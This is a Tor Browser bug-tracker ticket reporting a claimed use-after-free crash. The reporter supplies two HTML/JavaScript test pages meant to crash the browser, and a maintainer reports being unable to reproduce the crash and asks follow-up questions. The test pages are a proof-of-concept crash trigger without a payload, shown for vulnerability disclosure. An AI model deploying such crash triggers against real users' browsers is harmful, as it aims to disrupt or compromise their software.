Opened 11 days ago

Last modified 9 days ago

#26705 needs_information project

BUG Report ! Use after Free Vulnerability

Reported by: t4rkd3vilz
Owned by: tbb-team
Priority: Very High
Milestone:
Component: Applications/Tor Browser
Version:
Severity: Normal
Keywords:
Cc:
Actual Points:
Parent ID:
Points:
Reviewer:
Sponsor:

Description

Hello,

In Tor Browser, click New Tab.

In the new tab, open an HTML page with this code:

<style>
body { display: table }
</style>
<script>
function freenabo() {
try { fuzzPriv.forceGC(); } catch(err) { alert('XSS Detected aWEqwq :)'); }
}
function go() {
var s = document.getSelection();
window.find("1",true,false,true,false);
s.modify("extend","forward","line");
document.body.append(document.createElement("table"));
freenabo()
}
</script>
<body onload=go()>
<table>
<th>t4rkd3vilz</th>
</table>
<progress></progress>

Then open a second tab.

Code for the second tab:
<!DOCTYPE html>
<html>
<title>veryhandsome jameel naboo</title>
<body>
<script>
function send()
{
try { document.body.contentEditable = 'true'; } catch(e){}
try { var e0 = document.createElement("frameset"); } catch(e){}
try { document.body.appendChild(e0); } catch(e){}
try { e0.appendChild(document.createElement("BBBBBBBBBBBBBBB")); } catch(e){}
try {
e0.addEventListener("DOMAttrModified",function(){document.execCommand("SelectAll");e0['border']='-4400000000';}, false); e0.focus();} catch(e){}
try { e0.setAttribute('iframe'); } catch(e){}
try { document.body.insertBefore(e0); } catch(e){}
}
send();</script></html>

Result: Tor Browser crashes...

Child Tickets

Attachments (3)

tor2.png (73.3 KB) - added by t4rkd3vilz 9 days ago.
crash scenario
tor1.png (62.8 KB) - added by t4rkd3vilz 9 days ago.
crash tor 3.png (22.0 KB) - added by t4rkd3vilz 9 days ago.
result


Change History (6)

comment:1 Changed 11 days ago by Dbryrtfbcbhgf

Component: Core Tor/Tor → Applications/Tor Browser
Owner: set to tbb-team
Version: Tor: unspecified

comment:2 Changed 11 days ago by boklm

Status: new → needs_information

I tried this in Tor Browser 7.5.6, and 8.0a9, but this did not crash for me.

Changed 9 days ago by t4rkd3vilz

Attachment: tor2.png added

crash scenario

Changed 9 days ago by t4rkd3vilz

Attachment: tor1.png added

Changed 9 days ago by t4rkd3vilz

Attachment: crash tor 3.png added

result

comment:3 Changed 9 days ago by boklm

Some questions:

  • on which OS are you seeing this issue? So far we have tried loading the 2 html pages in 2 tabs on Linux, Windows 7 and macOS 10.11 without being able to reproduce the issue.
  • In the screenshots, you seem to be loading the pages locally (with file:/// URLs). Does this issue only happen with local pages, or can you reproduce it when loading them with http?
  • In tor2.png it looks like you open the second page using the file manager. Can you reproduce the issue by copy-pasting the address in the URL bar instead of using the file manager to open it? The error in crash tor 3.png looks like an error you would get if you try to run more than one instance of the browser. So the issue might be how the file manager has been configured to open new pages in Tor Browser.